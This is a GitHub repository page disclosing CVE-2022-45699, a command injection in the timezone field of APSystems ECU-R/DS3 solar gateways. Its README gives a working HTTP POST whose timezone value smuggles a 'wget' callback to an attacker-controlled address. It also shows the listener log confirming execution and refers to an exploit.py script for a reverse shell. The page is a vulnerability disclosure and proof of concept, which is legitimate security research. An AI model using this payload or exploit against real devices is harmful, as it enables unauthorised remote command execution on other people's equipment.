Skip to content

0xst4n/APSystems-ECU-R-RCE-Timezone

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

APSystems-DS3-RCE-Timezone

APSystems DS3 is vulnerable to command injection in the timezone field

demo

POST /index.php/management/set_timezone HTTP/1.1
Host: 192.168.1.99

timezone=;wget+192.168.1.87;#
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.1.99 - - [11/Nov/2022 14:28:04] "GET / HTTP/1.1" 200 

See exploit.py for an exploit to obtain a reverse shell

About

CVE-2022-45699 - APSystems ECU-R is vulnerable to command injection in the timezone field

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages